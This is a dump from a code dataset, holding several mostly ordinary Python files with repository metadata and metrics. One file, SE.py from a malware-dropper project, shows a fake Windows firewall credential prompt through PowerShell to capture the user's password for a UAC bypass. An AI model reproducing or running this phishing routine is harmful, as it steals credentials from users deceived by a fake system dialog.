| 27.415385 | 88 | 0.667789 | 241 | 1,782 | 4.684647 | 0.319502 | 0.093003 | 0.199291 | 0.062002 | 0.317095 | 0.186005 | 0.162976 | 0.136404 | 0.070859 | 0 | 0 | 0.026657 | 0.2211 | 1,782 | 64 | 89 | 27.84375 | 0.786744 | 0.247475 | 0 | 0 | 0 | 0 | 0.117932 | 0.021809 | 0 | 0 | 0 | 0 | 0.275862 | 1 | 0.206897 | false | 0 | 0.068966 | 0 | 0.275862 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9c92bf3f64934fbd92e6caa603001f0df9f4a83 | 560 | py | Python | setup.py | perlduck/check-mk-web-api | 37d58ab6f35ce9b176820dbb594d3079d747ba2a | [
"MIT"
] | null | null | null | setup.py | perlduck/check-mk-web-api | 37d58ab6f35ce9b176820dbb594d3079d747ba2a | [
"MIT"
] | null | null | null | setup.py | perlduck/check-mk-web-api | 37d58ab6f35ce9b176820dbb594d3079d747ba2a | [
"MIT"
] | null | null | null | from setuptools import setup
setup(
name='check_mk_web_api',
packages=['check_mk_web_api'],
version='1.7',
description='Library to talk to Check_Mk Web API',
author='Max Brenner',
author_email='xamrennerb@gmail.com',
url='https://github.com/brennerm/check-mk-web-api',
download_url='https://github.com/brennerm/check-mk-web-api/archive/1.6.tar.gz',
install_requires=['enum34;python_version<"3.4"', 'six'],
setup_requires=['pytest-runner'],
tests_require=['pytest'],
keywords=['check_mk', 'api', 'monitoring']
)
| 32.941176 | 83 | 0.683929 | 79 | 560 | 4.670886 | 0.582278 | 0.113821 | 0.135501 | 0.176152 | 0.205962 | 0.205962 | 0.205962 | 0.205962 | 0.205962 | 0 | 0 | 0.016563 | 0.1375 | 560 | 16 | 84 | 35 | 0.747412 | 0 | 0 | 0 | 0 | 0.066667 | 0.496429 | 0.048214 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9d06700171349672e188b624ea7e9f5f6e96ad7 | 1,643 | py | Python | src/uff/probe.py | davidbradway/uff.py | 118001211018a4fc95d1dd7304ae6335bdf805f9 | [
"MIT"
] | null | null | null | src/uff/probe.py | davidbradway/uff.py | 118001211018a4fc95d1dd7304ae6335bdf805f9 | [
"MIT"
] | null | null | null | src/uff/probe.py | davidbradway/uff.py | 118001211018a4fc95d1dd7304ae6335bdf805f9 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from typing import List
from uff.element import Element
from uff.element_geometry import ElementGeometry
from uff.impulse_response import ImpulseResponse
from uff.transform import Transform
from uff.uff_io import Serializable
@dataclass
class Probe(Serializable):
"""
Describes a generic ultrasound probe formed by a collection of elements.
Note:
Where focal_length specifies the lens focusing distance. Note that the
elements in element_geometry and impulse_response are referred by the
fields inside each member in element, avoiding unnecessary replication
of information.
More compact, although less general, descriptions are available for:
uff.probe.linear_array,
uff.probe.curvilinear_array, and
uff.probe.matrix_array.
"""
@staticmethod
def str_name():
return 'probes'
def serialize(self):
assert isinstance(self.element_geometry, list), \
'Probe.element_geometry should be a list of element geometries!'
return super().serialize()
# @classmethod
# def deserialize(cls, data: dict):
# pass
# >> TODO: These parameters are not defined in the standard
number_elements: int
pitch: float
element_height: float
element_width: float
## <<
transform: Transform
# TODO for conformity call `elements`
element: List[Element]
element_impulse_response: List[ImpulseResponse] = None
focal_length: float = None
# >> TODO: These parameters are not defined in the standard
element_geometry: List[ElementGeometry] = None
## <<
| 28.824561 | 76 | 0.714547 | 196 | 1,643 | 5.892857 | 0.494898 | 0.030303 | 0.024242 | 0.038095 | 0.077922 | 0.077922 | 0.077922 | 0.077922 | 0.077922 | 0 | 0 | 0 | 0.223372 | 1,643 | 56 | 77 | 29.339286 | 0.905172 | 0.419355 | 0 | 0 | 0 | 0 | 0.076148 | 0.024636 | 0 | 0 | 0 | 0.017857 | 0.04 | 1 | 0.08 | false | 0 | 0.28 | 0.04 | 0.84 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
b9d0b4eefbdf66ccea0bdd0a403c55ad3c54d344 | 713 | py | Python | src/main/views.py | alwinlee/todoJS | 79fc2bd0ab2c8910dae0fb434dc1fbeb66de5e4a | [
"MIT"
] | null | null | null | src/main/views.py | alwinlee/todoJS | 79fc2bd0ab2c8910dae0fb434dc1fbeb66de5e4a | [
"MIT"
] | null | null | null | src/main/views.py | alwinlee/todoJS | 79fc2bd0ab2c8910dae0fb434dc1fbeb66de5e4a | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from django.template.loader import get_template
from django.http import HttpResponse, Http404, JsonResponse
from django.db import connection, connections
from django.db.utils import OperationalError
from django.utils import timezone
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from django.contrib import auth
from rest_framework import routers, serializers, viewsets, status
from rest_framework.response import Response
from datetime import datetime
import json, urllib, os, time
import xsetting.util as util
def index(request):
return render(request, 'main/index.html', locals())
| 31 | 65 | 0.830295 | 98 | 713 | 6.010204 | 0.469388 | 0.169779 | 0.086587 | 0.071307 | 0.112054 | 0.112054 | 0 | 0 | 0 | 0 | 0 | 0.004747 | 0.113604 | 713 | 22 | 66 | 32.409091 | 0.927215 | 0 | 0 | 0.117647 | 0 | 0 | 0.021038 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.882353 | 0.058824 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
b9d5131be0e5e9177d71e6840b6639f996f0c9b6 | 2,735 | py | Python | src/system/resource/cluster.py | HiEST/gpu-topo-aware | 8125c2875ad942b9cecd9d5178062ee0d5100d04 | [
"Apache-2.0"
] | 7 | 2019-02-28T09:53:59.000Z | 2022-01-06T06:18:02.000Z | src/system/resource/cluster.py | HiEST/gpu-topo-aware | 8125c2875ad942b9cecd9d5178062ee0d5100d04 | [
"Apache-2.0"
] | null | null | null | src/system/resource/cluster.py | HiEST/gpu-topo-aware | 8125c2875ad942b9cecd9d5178062ee0d5100d04 | [
"Apache-2.0"
] | 4 | 2018-05-06T14:42:10.000Z | 2021-11-30T03:28:49.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Keeps the list of resources in the cluster.
#
# Copyright © 2017 Marcelo Amaral <marcelo.amaral@bsc.es>
import os
import json
import machine
class Cluster:
def __init__(self, config, num_machines):
n, resources = self.read_config(config)
if num_machines <= 0:
num_machines = n
self.resources = resources
self.machines = self.set_machines(self.resources, num_machines)
self.profiles = self.set_profile(config)
def set_profile(self, config):
"""The profile describes the execution time of collocated applications. Because we have a simple topology
with only four GPUs and two sockets, collocation always means applications running on both sockets, e.g.
application1 on GPUs 0-2 and application2 on GPUs 1-3, sharing the same inter-socket communication bus."""
file_name = json.loads(config.get("workload", "profile"))
cwd = os.getcwd()
path = os.path.join(cwd, "data/profiles/" + file_name + ".json")
with open(path, "r") as f:
data = f.read()
return json.loads(data)
def set_machines(self, config, num_machines):
machines = dict()
for id in range(num_machines):
for type, mr in config["machines"].iteritems():
machines[id] = machine.Machine(mr, type, id)
return machines
def read_config(self, config):
# TODO: the num_machines should also indicate the machine type
num_machines = json.loads(config.get("system", "num_machines"))
infra_file = json.loads(config.get("system", "infrastructure"))
cwd = os.getcwd()
path = os.path.join(cwd, "etc/" + infra_file + ".json")
with open(path, "r") as f:
data = f.read()
cluster_physical_resources = json.loads(data)
return num_machines, cluster_physical_resources
def get_num_free_gpus(self):
gpus = 0
for id, machine in self.machines.iteritems():
gpus += len(machine.get_free_gpus())
return gpus
def get_max_free_gpus_per_machine(self):
gpus = 0
for id, machine in self.machines.iteritems():
if len(machine.get_free_gpus()) > gpus:
gpus = len(machine.get_free_gpus())
return gpus
def get_free_gpus(self):
gpus = dict()
for id, machine in self.machines.iteritems():
machine_gpus = machine.get_free_gpus()
if len(machine_gpus) > 0:
if machine.id not in gpus:
gpus[machine.id] = dict()
gpus[machine.id] = machine_gpus
return gpus | 35.064103 | 117 | 0.616819 | 354 | 2,735 | 4.629944 | 0.316384 | 0.067114 | 0.033557 | 0.043929 | 0.23673 | 0.194631 | 0.194631 | 0.173276 | 0.139109 | 0.139109 | 0 | 0.007618 | 0.280073 | 2,735 | 78 | 118 | 35.064103 | 0.824276 | 0.072761 | 0 | 0.259259 | 0 | 0 | 0.041496 | 0 | 0 | 0 | 0 | 0.012821 | 0 | 0 | null | null | 0 | 0.055556 | null | null | 0.018519 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9dda9ad337899d8f415f19554f3fc6367c0f010 | 747 | py | Python | src/models/logistic_regression.py | AlessandroVol23/predict_ico_success_lmu | 988c4eea58afe7379b1d527bfad9d9a5238c00d7 | [
"MIT"
] | null | null | null | src/models/logistic_regression.py | AlessandroVol23/predict_ico_success_lmu | 988c4eea58afe7379b1d527bfad9d9a5238c00d7 | [
"MIT"
] | 3 | 2020-03-24T18:01:15.000Z | 2021-08-23T20:37:50.000Z | src/models/logistic_regression.py | AlessandroVol23/predict_ico_success_lmu | 988c4eea58afe7379b1d527bfad9d9a5238c00d7 | [
"MIT"
] | null | null | null | from sklearn.linear_model import LogisticRegression
from src.models.base_model import BaseModel
class LogisticRegressionModel(BaseModel):
def __init__(self):
self.hyperparameter = {
"max_iter": 10000
}
def get_name(self):
return 'logistic_regression'
def get_params(self):
return self.hyperparameter
def get_model(self, reinitialize=True):
if (reinitialize):
self.model = LogisticRegression(**self.hyperparameter)
return self.model
def fit(self, trn_x, trn_y, val_x=None, val_y=None):
self.model.fit(trn_x, trn_y)
def predict_proba(self, test_set):
preds = self.model.predict_proba(test_set)
return preds
| 24.096774 | 66 | 0.659973 | 90 | 747 | 5.244444 | 0.444444 | 0.076271 | 0.029661 | 0.033898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008977 | 0.254351 | 747 | 30 | 67 | 24.9 | 0.83842 | 0 | 0 | 0 | 0 | 0 | 0.036145 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0.047619 | 0.095238 | 0.095238 | 0.619048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
b9e2efcd77978181450991202864c9ace2f6c271 | 1,430 | py | Python | setup.py | yasserbdj96/ashar | dba8eab4e7e020776c3ba4736c01569ea0b24552 | [
"MIT"
] | null | null | null | setup.py | yasserbdj96/ashar | dba8eab4e7e020776c3ba4736c01569ea0b24552 | [
"MIT"
] | null | null | null | setup.py | yasserbdj96/ashar | dba8eab4e7e020776c3ba4736c01569ea0b24552 | [
"MIT"
] | null | null | null | from setuptools import setup,find_packages
setup(
name="ashar",
version="1.1.5",
author="Yasser Bdj (Boudjada Yasser)",
author_email="yasser.bdj96@gmail.com",
description='''This project is for data encryption with password protection.''',
long_description_content_type="text/markdown",
long_description=open('README.md','r').read(),
license='''MIT License''',
packages=find_packages(),
url="https://github.com/yasserbdj96/ashar",
project_urls={
'Author WebSite': "https://yasserbdj96.github.io/",
},
install_requires=['pipincluder'],
keywords=['yasserbdj96', 'python', 'encode', 'decode', 'key', 'password', 'encrypt anything with password', 'Ashar', 'Encryption', 'and', 'decryption.', 'This', 'project', 'is', 'for', 'data', 'encryption', 'with', 'password', 'protection.'],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Operating System :: Unix",
"Operating System :: MacOS :: MacOS X",
"Operating System :: Microsoft :: Windows",
"Topic :: Software Development :: Build Tools",
"Topic :: Software Development :: Libraries :: Python Modules",
'Topic :: Communications :: Email'
],
python_requires=">=3.x.x"
) | 46.129032 | 247 | 0.618182 | 143 | 1,430 | 6.111888 | 0.608392 | 0.04119 | 0.029748 | 0.036613 | 0.118993 | 0.118993 | 0.118993 | 0.118993 | 0.118993 | 0 | 0 | 0.012456 | 0.213986 | 1,430 | 31 | 248 | 46.129032 | 0.765125 | 0 | 0 | 0 | 0 | 0 | 0.562455 | 0.015703 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.064516 | 0.032258 | 0 | 0.032258 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
b9e41144b9fbc6a709c1232043b4319e2bea60ba | 286 | py | Python | Evie/__main__.py | LEGENDXOP/Evie | ad505f356c034fa19287da40691f8a664eedc4c8 | [
"BSD-3-Clause"
] | null | null | null | Evie/__main__.py | LEGENDXOP/Evie | ad505f356c034fa19287da40691f8a664eedc4c8 | [
"BSD-3-Clause"
] | null | null | null | Evie/__main__.py | LEGENDXOP/Evie | ad505f356c034fa19287da40691f8a664eedc4c8 | [
"BSD-3-Clause"
] | 3 | 2021-04-07T15:57:26.000Z | 2022-01-09T01:20:11.000Z | from sys import argv, exit
from Evie import tbot
from Evie import TOKEN
import Evie.events
try:
tbot.start(bot_token=TOKEN)
except Exception:
print("Bot Token Invalid")
exit(1)
if len(argv) not in (1, 3, 4):
tbot.disconnect()
else:
tbot.run_until_disconnected()
| 15.888889 | 33 | 0.702797 | 45 | 286 | 4.4 | 0.622222 | 0.080808 | 0.141414 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017467 | 0.199301 | 286 | 17 | 34 | 16.823529 | 0.847162 | 0 | 0 | 0 | 0 | 0 | 0.059649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.307692 | 0 | 0.307692 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
b9f9d9f28968cc6d0543b6b18d535d7ad78bf139 | 576 | py | Python | resources/SE.py | mehrdad-shokri/Dr0p1t-Framework | db9bc2dc58f33357138e7bd03d2cd81f0189753d | [
"MIT"
] | 1,345 | 2017-02-11T23:00:45.000Z | 2022-03-28T13:22:11.000Z | resources/SE.py | crazykid199/Dr0p1t-Framework | f14071fa34b2c8e94b777f397019a08bc22cc22b | [
"MIT"
] | 29 | 2017-02-13T17:44:44.000Z | 2018-04-12T17:02:45.000Z | resources/SE.py | crazykid199/Dr0p1t-Framework | f14071fa34b2c8e94b777f397019a08bc22cc22b | [
"MIT"
] | 404 | 2017-02-12T16:12:41.000Z | 2022-02-28T02:40:54.000Z | #Written by: Karim shoair - D4Vinci ( Dr0p1t-Framework )
#In this script I store some SE tricks to use ;)
#Start
#Get the user password by fooling him and then uses it to run commands as the user by psexec to bypass UAC
def ask_pwd():
while True:
cmd = '''Powershell "$cred=$host.ui.promptforcredential('Windows firewall permission','',[Environment]::UserName,[Environment]::UserDomainName); echo $cred.getnetworkcredential().password;"'''
response = get_output(cmd)
if response.strip() != '' and not response.strip().startswith('[!]'): break
return response.strip()
| 48 | 194 | 0.730903 | 78 | 576 | 5.371795 | 0.782051 | 0.093079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006012 | 0.133681 | 576 | 11 | 195 | 52.363636 | 0.833667 | 0.368056 | 0 | 0 | 0 | 0.166667 | 0.508333 | 0.425 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.166667 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
b9faa5ca3e34b24c7365db5cf3098be254abc460 | 869 | py | Python | python-ardrone-master/opencv.py | Verbalist/DronHackAngle | b51ae8f4752fb0616b6bb32616c30ac9d36f6a11 | [
"MIT"
] | null | null | null | python-ardrone-master/opencv.py | Verbalist/DronHackAngle | b51ae8f4752fb0616b6bb32616c30ac9d36f6a11 | [
"MIT"
] | null | null | null | python-ardrone-master/opencv.py | Verbalist/DronHackAngle | b51ae8f4752fb0616b6bb32616c30ac9d36f6a11 | [
"MIT"
] | null | null | null | import os
import sys
import cv2
import numpy as np
import logging
MODEL_FILE = "model.mdl"
def detect(img, cascade):
gray = to_grayscale(img)
rects = cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=2, minSize=(15, 15), flags = cv2.CASCADE_SCALE_IMAGE)
if len(rects) == 0:
return []
return rects
#haarcascade_frontalface_alt.xml
#haarcascade_fullbody.xml
def detect_faces(img):
cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
return detect(img, cascade)
def to_grayscale(img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
gray = cv2.equalizeHist(gray)
return gray
def contains_face(img):
return len(detect_faces(img)) > 0
def save(path, img):
cv2.imwrite(path, img)
def crop_faces(img, faces):
for face in faces:
x, y, h, w = [result for result in face]
return img[y:y+h,x:x+w]
| 22.868421 | 124 | 0.713464 | 131 | 869 | 4.618321 | 0.442748 | 0.049587 | 0.052893 | 0.092562 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023644 | 0.172612 | 869 | 37 | 125 | 23.486486 | 0.817803 | 0.063291 | 0 | 0 | 0 | 0 | 0.049322 | 0.038224 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.185185 | 0.037037 | 0.62963 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
b9fc7b2e5b657a376e8b1bc3260644d2fcc0ce1e | 230 | py | Python | nesi/vendors/KeyMile/accessPoints/root/unit/logport/logportsManagementFunctions.py | inexio/NESi | 920b23ccaf293733b4b571e4df27929c036257f7 | [
"BSD-2-Clause"
] | 30 | 2020-09-03T06:02:38.000Z | 2022-03-11T16:34:18.000Z | vendors/KeyMile/accessPoints/root/unit/logport/logportsManagementFunctions.py | Tubbz-alt/NESi | 0db169dd6378fbd097380280cc41440e652de19e | [
"BSD-2-Clause"
] | 2 | 2021-01-15T10:33:23.000Z | 2021-02-21T21:04:37.000Z | vendors/KeyMile/accessPoints/root/unit/logport/logportsManagementFunctions.py | Tubbz-alt/NESi | 0db169dd6378fbd097380280cc41440e652de19e | [
"BSD-2-Clause"
] | 3 | 2020-12-19T09:11:19.000Z | 2022-02-07T22:15:34.000Z | main = {
'General': {
'Prop': {
'Labels': 'rw',
'AlarmStatus': 'r-'
}
}
}
cfgm = {
'Logicalport': {
'Cmd': (
'Create',
'Delete'
)
}
} | 13.529412 | 31 | 0.282609 | 12 | 230 | 5.416667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.530435 | 230 | 17 | 32 | 13.529412 | 0.601852 | 0 | 0 | 0 | 0 | 0 | 0.251082 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9fcebe268137550d153588efac21c43c2d0c43c | 586 | py | Python | applicationinsights/channel/SynchronousSender.py | janhaviagrawal/ApplicationInsights-Python | 49a58cd688a866c71c952019b6c9ee71772443c3 | [
"MIT"
] | 1 | 2019-05-26T12:52:55.000Z | 2019-05-26T12:52:55.000Z | applicationinsights/channel/SynchronousSender.py | janhaviagrawal/ApplicationInsights-Python | 49a58cd688a866c71c952019b6c9ee71772443c3 | [
"MIT"
] | null | null | null | applicationinsights/channel/SynchronousSender.py | janhaviagrawal/ApplicationInsights-Python | 49a58cd688a866c71c952019b6c9ee71772443c3 | [
"MIT"
] | 1 | 2019-05-26T12:56:38.000Z | 2019-05-26T12:56:38.000Z | from .SenderBase import SenderBase
class SynchronousSender(SenderBase):
"""A synchronous sender that works in conjunction with the :class:`SynchronousQueue`. The queue will call
:func:`send` on the current instance with the data to send.
"""
def __init__(self, service_endpoint_uri='https://dc.services.visualstudio.com/v2/track'):
"""Initializes a new instance of the class.
Args:
service_endpoint_uri (String): the address of the service to send telemetry data to.
"""
SenderBase.__init__(self, service_endpoint_uri) | 45.076923 | 109 | 0.711604 | 75 | 586 | 5.373333 | 0.6 | 0.111663 | 0.133995 | 0.114144 | 0.129032 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002141 | 0.203072 | 586 | 13 | 110 | 45.076923 | 0.860814 | 0.520478 | 0 | 0 | 0 | 0 | 0.189873 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
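The docstring's queue-to-sender handshake (the queue calls `send` on the sender with the batch to transmit) can be sketched with stand-ins; these stub classes are illustrative, not the applicationinsights ones:

```python
# Illustrative stand-ins for the SynchronousQueue / SynchronousSender pair.
class StubSender:
    def __init__(self):
        self.sent = []

    def send(self, data_to_send):
        # A real SynchronousSender would POST this batch to service_endpoint_uri.
        self.sent.append(list(data_to_send))


class StubSynchronousQueue:
    def __init__(self, sender):
        self._sender = sender
        self._items = []

    def put(self, item):
        self._items.append(item)
        self.flush()  # synchronous: every put triggers a send

    def flush(self):
        if self._items:
            self._sender.send(self._items)
            self._items = []


sender = StubSender()
queue = StubSynchronousQueue(sender)
queue.put({"name": "Event"})
```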
6a034850a5c2ebc5999caf58cfe48126affd8dbe | 99,548 | py | Python | keepercommander/proto/APIRequest_pb2.py | Keeper-Security/commander | 93fee5d2ba56f2288e00ab33003597d00a302b5c | [
"MIT"
] | null | null | null | keepercommander/proto/APIRequest_pb2.py | Keeper-Security/commander | 93fee5d2ba56f2288e00ab33003597d00a302b5c | [
"MIT"
] | null | null | null | keepercommander/proto/APIRequest_pb2.py | Keeper-Security/commander | 93fee5d2ba56f2288e00ab33003597d00a302b5c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: APIRequest.proto
"""Generated protocol buffer code."""
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from . import enterprise_pb2 as enterprise__pb2
DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(
    b'\n\x10\x41PIRequest.proto\x12\x0e\x41uthentication\x1a\x10\x65nterprise.proto\"\xb0\x01\n\nApiRequest\x12 \n\x18\x65ncryptedTransmissionKey\x18\x01 \x01(\x0c\x12\x13\n\x0bpublicKeyId\x18\x02 \x01(\x05\x12\x0e\n\x06locale\x18\x03 \x01(\t\x12\x18\n\x10\x65ncryptedPayload\x18\x04 \x01(\x0c\x12\x16\n\x0e\x65ncryptionType\x18\x05 \x01(\x05\x12\x11\n\trecaptcha\x18\x06 \x01(\t\x12\x16\n\x0esubEnvironment\x18\x07 \x01(\t\"j\n\x11\x41piRequestPayload\x12\x0f\n\x07payload\x18\x01 \x01(\x0c\x12\x1d\n\x15\x65ncryptedSessionToken\x18\x02 \x01(\x0c\x12\x11\n\ttimeToken\x18\x03 \x01(\x0c\x12\x12\n\napiVersion\x18\x04 \x01(\x05\"6\n\tTransform\x12\x0b\n\x03key\x18\x01 \x01(\x0c\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x02 \x01(\x0c\":\n\rDeviceRequest\x12\x15\n\rclientVersion\x18\x01 \x01(\t\x12\x12\n\ndeviceName\x18\x02 \x01(\t\"T\n\x0b\x41uthRequest\x12\x15\n\rclientVersion\x18\x01 \x01(\t\x12\x10\n\x08username\x18\x02 \x01(\t\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x03 \x01(\x0c\"\x8b\x01\n\x14NewUserMinimumParams\x12\x19\n\x11minimumIterations\x18\x01 \x01(\x05\x12\x1a\n\x12passwordMatchRegex\x18\x02 \x03(\t\x12 \n\x18passwordMatchDescription\x18\x03 \x03(\t\x12\x1a\n\x12isEnterpriseDomain\x18\x04 \x01(\x08\"\x89\x01\n\x0fPreLoginRequest\x12\x30\n\x0b\x61uthRequest\x18\x01 \x01(\x0b\x32\x1b.Authentication.AuthRequest\x12,\n\tloginType\x18\x02 \x01(\x0e\x32\x19.Authentication.LoginType\x12\x16\n\x0etwoFactorToken\x18\x03 \x01(\x0c\"\x80\x02\n\x0cLoginRequest\x12\x30\n\x0b\x61uthRequest\x18\x01 \x01(\x0b\x32\x1b.Authentication.AuthRequest\x12,\n\tloginType\x18\x02 \x01(\x0e\x32\x19.Authentication.LoginType\x12\x1f\n\x17\x61uthenticationHashPrime\x18\x03 \x01(\x0c\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x04 \x01(\x0c\x12\x14\n\x0c\x61uthResponse\x18\x05 \x01(\x0c\x12\x16\n\x0emcEnterpriseId\x18\x06 \x01(\x05\x12\x12\n\npush_token\x18\x07 \x01(\t\x12\x10\n\x08platform\x18\x08'
    b' \x01(\t\"\\\n\x0e\x44\x65viceResponse\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12,\n\x06status\x18\x02 \x01(\x0e\x32\x1c.Authentication.DeviceStatus\"V\n\x04Salt\x12\x12\n\niterations\x18\x01 \x01(\x05\x12\x0c\n\x04salt\x18\x02 \x01(\x0c\x12\x11\n\talgorithm\x18\x03 \x01(\x05\x12\x0b\n\x03uid\x18\x04 \x01(\x0c\x12\x0c\n\x04name\x18\x05 \x01(\t\" \n\x10TwoFactorChannel\x12\x0c\n\x04type\x18\x01 \x01(\x05\"\xe2\x02\n\x11StartLoginRequest\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12\x10\n\x08username\x18\x02 \x01(\t\x12\x15\n\rclientVersion\x18\x03 \x01(\t\x12\x19\n\x11messageSessionUid\x18\x04 \x01(\x0c\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x05 \x01(\x0c\x12,\n\tloginType\x18\x06 \x01(\x0e\x32\x19.Authentication.LoginType\x12\x16\n\x0emcEnterpriseId\x18\x07 \x01(\x05\x12\x30\n\x0bloginMethod\x18\x08 \x01(\x0e\x32\x1b.Authentication.LoginMethod\x12\x15\n\rforceNewLogin\x18\t \x01(\x08\x12\x11\n\tcloneCode\x18\n \x01(\x0c\x12\x18\n\x10v2TwoFactorToken\x18\x0b \x01(\t\x12\x12\n\naccountUid\x18\x0c \x01(\x0c\"\x85\x04\n\rLoginResponse\x12.\n\nloginState\x18\x01 \x01(\x0e\x32\x1a.Authentication.LoginState\x12\x12\n\naccountUid\x18\x02 \x01(\x0c\x12\x17\n\x0fprimaryUsername\x18\x03 \x01(\t\x12\x18\n\x10\x65ncryptedDataKey\x18\x04 \x01(\x0c\x12\x42\n\x14\x65ncryptedDataKeyType\x18\x05 \x01(\x0e\x32$.Authentication.EncryptedDataKeyType\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x06 